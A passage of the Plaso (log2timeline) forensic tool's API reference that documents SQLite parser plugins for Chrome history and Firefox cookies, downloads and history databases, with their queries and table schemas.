TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE "urls"(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL, interrupt_reason INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL, mime_type VARCHAR(255) NOT NULL DEFAULT "", original_mime_type VARCHAR(255) NOT NULL DEFAULT "", guid VARCHAR NOT NULL DEFAULT \'\', hash BLOB NOT NULL DEFAULT X\'\', http_method VARCHAR NOT NULL DEFAULT \'\', tab_url VARCHAR NOT NULL DEFAULT \'\', tab_referrer_url VARCHAR NOT NULL DEFAULT \'\', site_url VARCHAR NOT NULL DEFAULT \'\', last_access_time INTEGER NOT NULL DEFAULT 0, transient INTEGER NOT NULL DEFAULT 0)', 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL, finished INTEGER NOT NULL DEFAULT 0,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE "urls"(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': "CREATE TABLE downloads (id INTEGER PRIMARY KEY,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,referrer VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL, guid VARCHAR NOT NULL DEFAULT '', hash BLOB NOT NULL DEFAULT X'', http_method VARCHAR NOT NULL DEFAULT '', tab_url VARCHAR NOT NULL DEFAULT '', tab_referrer_url VARCHAR NOT NULL DEFAULT '', site_url VARCHAR NOT NULL DEFAULT '', last_access_time INTEGER NOT NULL DEFAULT 0, transient INTEGER NOT NULL DEFAULT 0)", 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL, finished INTEGER NOT NULL DEFAULT 0,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE "urls"(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,guid VARCHAR NOT NULL,current_path LONGVARCHAR NOT NULL,target_path LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,danger_type INTEGER NOT NULL,interrupt_reason INTEGER NOT NULL,hash BLOB NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL,last_access_time INTEGER NOT NULL,transient INTEGER NOT NULL,referrer VARCHAR NOT NULL,site_url VARCHAR NOT NULL,tab_url VARCHAR NOT NULL,tab_referrer_url VARCHAR NOT NULL,http_method VARCHAR NOT NULL,by_ext_id VARCHAR NOT NULL,by_ext_name VARCHAR NOT NULL,etag VARCHAR NOT NULL,last_modified VARCHAR NOT NULL,mime_type VARCHAR(255) NOT NULL,original_mime_type VARCHAR(255) NOT NULL)', 'downloads_slices': 'CREATE TABLE downloads_slices (download_id INTEGER NOT NULL,offset INTEGER NOT NULL,received_bytes INTEGER NOT NULL, finished INTEGER NOT NULL DEFAULT 0,PRIMARY KEY (download_id, offset) )', 'downloads_url_chains': 'CREATE TABLE downloads_url_chains (id INTEGER NOT NULL,chain_index INTEGER NOT NULL,url LONGVARCHAR NOT NULL, PRIMARY KEY (id, chain_index) )', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL)', 'typed_url_sync_metadata': 'CREATE TABLE typed_url_sync_metadata (storage_key INTEGER PRIMARY KEY NOT NULL,value BLOB)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,visit_duration INTEGER DEFAULT 0 NOT NULL)'}] Plaso (log2timeline), Release 20210606 class plaso.parsers.sqlite_plugins.chrome_history.GoogleChrome8HistoryPlugin Bases: plaso.parsers.sqlite_plugins.chrome_history.BaseGoogleChromeHistoryPlugin SQLite parser plugin for Google Chrome 8 - 25 history database files. DATA_FORMAT = 'Google Chrome 8 - 25 history SQLite database file' NAME = 'chrome_8_history' ParseFileDownloadedRow(parser_mediator, query, row, **unused_kwargs) Parses a file downloaded row. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. QUERIES = [('SELECT urls.id, urls.url, urls.title, urls.visit_count, urls.typed_count, urls.last_visit_time, urls.hidden, visits.visit_time, visits.from_visit, visits.transition, visits.id AS visit_id FROM urls, visits WHERE urls.id = visits.url ORDER BY visits.visit_time', 'ParseLastVisitedRow'), ('SELECT id, full_path, url, start_time, received_bytes, total_bytes, state FROM downloads', 'ParseFileDownloadedRow')] REQUIRED_STRUCTURE = {'downloads': frozenset({'full_path', 'id', 'received_bytes', 'start_time', 'state', 'total_bytes', 'url'}), 'urls': frozenset({'hidden', 'id', 'last_visit_time', 'title', 'typed_count', 'url', 'visit_count'}), 'visits': frozenset({'from_visit', 'id', 'transition', 'visit_time'})}

5.1. Subpackages 257 Plaso (log2timeline), Release 20210606

SCHEMAS = [{'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,full_path LONGVARCHAR NOT NULL,url LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL)', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY,value LONGVARCHAR)', 'presentation': 'CREATE TABLE presentation(url_id INTEGER PRIMARY KEY,pres_index INTEGER NOT NULL)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL,pres_index INTEGER DEFAULT -1 NOT NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,is_indexed BOOLEAN)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,full_path LONGVARCHAR NOT NULL,url LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL)', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY,value LONGVARCHAR)', 'presentation': 'CREATE TABLE presentation(url_id INTEGER PRIMARY KEY,pres_index INTEGER NOT NULL)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL,pres_index INTEGER DEFAULT -1 NOT NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,is_indexed BOOLEAN)'}, {'downloads': 'CREATE TABLE downloads (id INTEGER PRIMARY KEY,full_path LONGVARCHAR NOT NULL,url LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL)', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'presentation': 'CREATE TABLE presentation(url_id INTEGER PRIMARY KEY,pres_index INTEGER NOT NULL)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL,pres_index INTEGER DEFAULT -1 NOT NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT 258 NULL,segment_id INTEGER,is_indexed BOOLEAN)'}, {'downloads': Chapter'CREATE 5. TABLE plaso package downloads (id INTEGER PRIMARY KEY,full_path LONGVARCHAR NOT NULL,url LONGVARCHAR NOT NULL,start_time INTEGER NOT NULL,received_bytes INTEGER NOT NULL,total_bytes INTEGER NOT NULL,state INTEGER NOT NULL,end_time INTEGER NOT NULL,opened INTEGER NOT NULL)', 'keyword_search_terms': 'CREATE TABLE keyword_search_terms (keyword_id INTEGER NOT NULL,url_id INTEGER NOT NULL,lower_term LONGVARCHAR NOT NULL,term LONGVARCHAR NOT NULL)', 'meta': 'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, value LONGVARCHAR)', 'presentation': 'CREATE TABLE presentation(url_id INTEGER PRIMARY KEY,pres_index INTEGER NOT NULL)', 'segment_usage': 'CREATE TABLE segment_usage (id INTEGER PRIMARY KEY,segment_id INTEGER NOT NULL,time_slot INTEGER NOT NULL,visit_count INTEGER DEFAULT 0 NOT NULL)', 'segments': 'CREATE TABLE segments (id INTEGER PRIMARY KEY,name VARCHAR,url_id INTEGER NON NULL,pres_index INTEGER DEFAULT -1 NOT NULL)', 'urls': 'CREATE TABLE urls(id INTEGER PRIMARY KEY,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL,favicon_id INTEGER DEFAULT 0 NOT NULL)', 'visit_source': 'CREATE TABLE visit_source(id INTEGER PRIMARY KEY,source INTEGER NOT NULL)', 'visits': 'CREATE TABLE visits(id INTEGER PRIMARY KEY,url INTEGER NOT NULL,visit_time INTEGER NOT NULL,from_visit INTEGER,transition INTEGER DEFAULT 0 NOT NULL,segment_id INTEGER,is_indexed BOOLEAN,visit_duration INTEGER DEFAULT 0 NOT NULL)'}] Plaso (log2timeline), Release 20210606 plaso.parsers.sqlite_plugins.firefox_cookies module

SQLite parser plugin for Mozilla Firefox cookies database files. class plaso.parsers.sqlite_plugins.firefox_cookies.FirefoxCookieEventData Bases: plaso.containers.events.EventData Firefox Cookie event data. cookie_name name field of the cookie. Type str data cookie data. Type str httponly True if the cookie cannot be accessed through client side script. Type bool host hostname of host that set the cookie value. Type str offset identifier of the row, from which the event data was extracted. Type str path URI of the page that set the cookie. Type str query SQL query that was used to obtain the event data. Type str secure True if the cookie should only be transmitted over a secure channel. Type bool DATA_TYPE = 'firefox:cookie:entry' class plaso.parsers.sqlite_plugins.firefox_cookies.FirefoxCookiePlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for Mozilla Firefox cookies database files. Also see: https://hg.mozilla.org/mozilla-central/file/349a2f003529/netwerk/cookie/nsCookie.h DATA_FORMAT = 'Mozilla Firefox cookies SQLite database file' NAME = 'firefox_cookies' ParseCookieRow(parser_mediator, query, row, **unused_kwargs) Parses a cookie row. Parameters

5.1. Subpackages 259 Plaso (log2timeline), Release 20210606

• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. QUERIES = [('SELECT id, baseDomain, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly FROM moz_cookies', 'ParseCookieRow')] REQUIRED_STRUCTURE = {'moz_cookies': frozenset({'baseDomain', 'creationTime', 'expiry', 'host', 'id', 'isHttpOnly', 'isSecure', 'lastAccessed', 'name', 'path', 'value'})} SCHEMAS = [{'moz_cookies': 'CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, baseDomain TEXT, appId INTEGER DEFAULT 0, inBrowserElement INTEGER DEFAULT 0, name TEXT, value TEXT, host TEXT, path TEXT, expiry INTEGER, lastAccessed INTEGER, creationTime INTEGER, isSecure INTEGER, isHttpOnly INTEGER, CONSTRAINT moz_uniqueid UNIQUE (name, host, path, appId, inBrowserElement))'}] plaso.parsers.sqlite_plugins.firefox_downloads module

SQLite parser plugin for Mozilla Firefox downloads database files. class plaso.parsers.sqlite_plugins.firefox_downloads.FirefoxDownloadEventData Bases: plaso.containers.events.EventData Firefox download event data. full_path full path of the target of the download. Type str mime_type mime type of the download. Type str name name of the download. Type str offset identifier of the row, from which the event data was extracted. Type str query SQL query that was used to obtain the event data. Type str received_bytes number of bytes received. Type int referrer referrer URL of the download. Type str

260 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

temporary_location temporary location of the download. Type str total_bytes total number of bytes of the download. Type int url source URL of the download. Type str DATA_TYPE = 'firefox:downloads:download' class plaso.parsers.sqlite_plugins.firefox_downloads.FirefoxDownloadsPlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for Mozilla Firefox downloads database files. The Mozilla Firefox downloads database file is typically stored in: downloads.sqlite DATA_FORMAT = 'Mozilla Firefox downloads SQLite database (downloads.sqlite) file' NAME = 'firefox_downloads' ParseDownloadsRow(parser_mediator, query, row, **unused_kwargs) Parses a downloads row. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. QUERIES = [('SELECT moz_downloads.id, moz_downloads.name, moz_downloads.source, moz_downloads.target, moz_downloads.tempPath, moz_downloads.startTime, moz_downloads.endTime, moz_downloads.state, moz_downloads.referrer, moz_downloads.currBytes, moz_downloads.maxBytes, moz_downloads.mimeType FROM moz_downloads', 'ParseDownloadsRow')] REQUIRED_STRUCTURE = {'moz_downloads': frozenset({'currBytes', 'endTime', 'id', 'maxBytes', 'mimeType', 'name', 'referrer', 'source', 'startTime', 'state', 'target', 'tempPath'})} SCHEMAS = [{'moz_downloads': 'CREATE TABLE moz_downloads (id INTEGER PRIMARY KEY, name TEXT, source TEXT, target TEXT, tempPath TEXT, startTime INTEGER, endTime INTEGER, state INTEGER, referrer TEXT, entityID TEXT, currBytes INTEGER NOT NULL DEFAULT 0, maxBytes INTEGER NOT NULL DEFAULT -1, mimeType TEXT, preferredApplication TEXT, preferredAction INTEGER NOT NULL DEFAULT 0, autoResume INTEGER NOT NULL DEFAULT 0)'}]

5.1. Subpackages 261 Plaso (log2timeline), Release 20210606 plaso.parsers.sqlite_plugins.firefox_history module

SQLite parser plugin for Mozilla Firefox history database files. class plaso.parsers.sqlite_plugins.firefox_history.FirefoxHistoryPlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for Mozilla Firefox history database files. The Mozilla Firefox history database file is typically stored in: places.sqlite DATA_FORMAT = 'Mozilla Firefox history SQLite database (places.sqlite) file' NAME = 'firefox_history' ParseBookmarkAnnotationRow(parser_mediator, query, row, **unused_kwargs) Parses a bookmark annotation row. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. ParseBookmarkFolderRow(parser_mediator, query, row, **unused_kwargs) Parses a bookmark folder row. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. ParseBookmarkRow(parser_mediator, query, row, **unused_kwargs) Parses a bookmark row. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. ParsePageVisitedRow(parser_mediator, query, row, cache=None, database=None, **unused_kwargs) Parses a page visited row. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. • cache (Optional[SQLiteCache]) – cache. • database (Optional[SQLiteDatabase]) – database.

262 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

QUERIES = [('SELECT moz_historyvisits.id, moz_places.url, moz_places.title, moz_places.visit_count, moz_historyvisits.visit_date, moz_historyvisits.from_visit, moz_places.rev_host, moz_places.hidden, moz_places.typed, moz_historyvisits.visit_type FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id', 'ParsePageVisitedRow'), ('SELECT moz_bookmarks.type, moz_bookmarks.title AS bookmark_title, moz_bookmarks.dateAdded, moz_bookmarks.lastModified, moz_places.url, moz_places.title AS places_title, moz_places.rev_host, moz_places.visit_count, moz_bookmarks.id FROM moz_places, moz_bookmarks WHERE moz_bookmarks.fk = moz_places.id AND moz_bookmarks.type <> 3', 'ParseBookmarkRow'), ('SELECT moz_items_annos.content, moz_items_annos.dateAdded, moz_items_annos.lastModified, moz_bookmarks.title, moz_places.url, moz_places.rev_host, moz_items_annos.id FROM moz_items_annos, moz_bookmarks, moz_places WHERE moz_items_annos.item_id = moz_bookmarks.id AND moz_bookmarks.fk = moz_places.id', 'ParseBookmarkAnnotationRow'), ('SELECT moz_bookmarks.id, moz_bookmarks.title,moz_bookmarks.dateAdded, moz_bookmarks.lastModified FROM moz_bookmarks WHERE moz_bookmarks.type = 2', 'ParseBookmarkFolderRow')] REQUIRED_STRUCTURE = {'moz_bookmarks': frozenset({'dateAdded', 'fk', 'id', 'lastModified', 'title', 'type'}), 'moz_historyvisits': frozenset({'from_visit', 'id', 'place_id', 'visit_date', 'visit_type'}), 'moz_items_annos': frozenset({'content', 'dateAdded', 'id', 'item_id', 'lastModified'}), 'moz_places': frozenset({'hidden', 'id', 'rev_host', 'title', 'typed', 'url', 'visit_count'})}

5.1. Subpackages 263 Plaso (log2timeline), Release 20210606

SCHEMAS = [{'moz_anno_attributes': 'CREATE TABLE moz_anno_attributes ( id INTEGER PRIMARY KEY, name VARCHAR(32) UNIQUE NOT NULL)', 'moz_annos': 'CREATE TABLE moz_annos ( id INTEGER PRIMARY KEY, place_id INTEGER NOT NULL, anno_attribute_id INTEGER, mime_type VARCHAR(32) DEFAULT NULL, content LONGVARCHAR, flags INTEGER DEFAULT 0, expiration INTEGER DEFAULT 0, type INTEGER DEFAULT 0, dateAdded INTEGER DEFAULT 0, lastModified INTEGER DEFAULT 0)', 'moz_bookmarks': 'CREATE TABLE moz_bookmarks ( id INTEGER PRIMARY KEY, type INTEGER, fk INTEGER DEFAULT NULL, parent INTEGER, position INTEGER, title LONGVARCHAR, keyword_id INTEGER, folder_type TEXT, dateAdded INTEGER, lastModified INTEGER)', 'moz_bookmarks_roots': 'CREATE TABLE moz_bookmarks_roots ( root_name VARCHAR(16) UNIQUE, folder_id INTEGER)', 'moz_favicons': 'CREATE TABLE moz_favicons ( id INTEGER PRIMARY KEY, url LONGVARCHAR UNIQUE, data BLOB, mime_type VARCHAR(32), expiration LONG)', 'moz_historyvisits': 'CREATE TABLE moz_historyvisits ( id INTEGER PRIMARY KEY, from_visit INTEGER, place_id INTEGER, visit_date INTEGER, visit_type INTEGER, session INTEGER)', 'moz_inputhistory': 'CREATE TABLE moz_inputhistory ( place_id INTEGER NOT NULL, input LONGVARCHAR NOT NULL, use_count INTEGER, PRIMARY KEY (place_id, input))', 'moz_items_annos': 'CREATE TABLE moz_items_annos ( id INTEGER PRIMARY KEY, item_id INTEGER NOT NULL, anno_attribute_id INTEGER, mime_type VARCHAR(32) DEFAULT NULL, content LONGVARCHAR, flags INTEGER DEFAULT 0, expiration INTEGER DEFAULT 0, type INTEGER DEFAULT 0, dateAdded INTEGER DEFAULT 0, lastModified INTEGER DEFAULT 0)', 'moz_keywords': 'CREATE TABLE moz_keywords ( id INTEGER PRIMARY KEY AUTOINCREMENT, keyword TEXT UNIQUE)', 'moz_places': 'CREATE TABLE moz_places ( id INTEGER PRIMARY KEY, url LONGVARCHAR, title LONGVARCHAR, rev_host LONGVARCHAR, visit_count INTEGER DEFAULT 0, hidden INTEGER DEFAULT 0 NOT NULL, typed INTEGER DEFAULT 0 NOT NULL, favicon_id INTEGER, frecency INTEGER DEFAULT -1 NOT NULL, last_visit_date INTEGER )'}, {'moz_anno_attributes': 'CREATE TABLE moz_anno_attributes ( id INTEGER PRIMARY KEY, name VARCHAR(32) UNIQUE NOT NULL)', 'moz_annos': 'CREATE TABLE moz_annos ( id INTEGER PRIMARY KEY, place_id INTEGER NOT NULL, anno_attribute_id INTEGER, mime_type VARCHAR(32) DEFAULT NULL, content LONGVARCHAR, flags INTEGER DEFAULT 0, expiration INTEGER DEFAULT 0, type INTEGER DEFAULT 0, dateAdded INTEGER DEFAULT 0, lastModified INTEGER DEFAULT 0)', 'moz_bookmarks': 'CREATE TABLE moz_bookmarks ( id INTEGER PRIMARY KEY, type INTEGER, fk INTEGER DEFAULT NULL, parent INTEGER, position INTEGER, title LONGVARCHAR, keyword_id INTEGER, folder_type TEXT, dateAdded INTEGER, lastModified INTEGER, guid TEXT)', 'moz_bookmarks_roots': 'CREATE TABLE moz_bookmarks_roots ( root_name VARCHAR(16) UNIQUE, folder_id INTEGER)', 'moz_favicons': 'CREATE TABLE moz_favicons ( id INTEGER PRIMARY KEY, url LONGVARCHAR UNIQUE, data BLOB, mime_type VARCHAR(32), expiration LONG, guid TEXT)', 'moz_historyvisits': 'CREATE TABLE moz_historyvisits ( id INTEGER PRIMARY KEY, from_visit INTEGER, place_id INTEGER, visit_date INTEGER, visit_type INTEGER, session INTEGER)', 'moz_hosts': 'CREATE TABLE moz_hosts ( id INTEGER PRIMARY KEY, host TEXT NOT NULL UNIQUE, frecency INTEGER, typed INTEGER NOT NULL DEFAULT 0, prefix TEXT)', 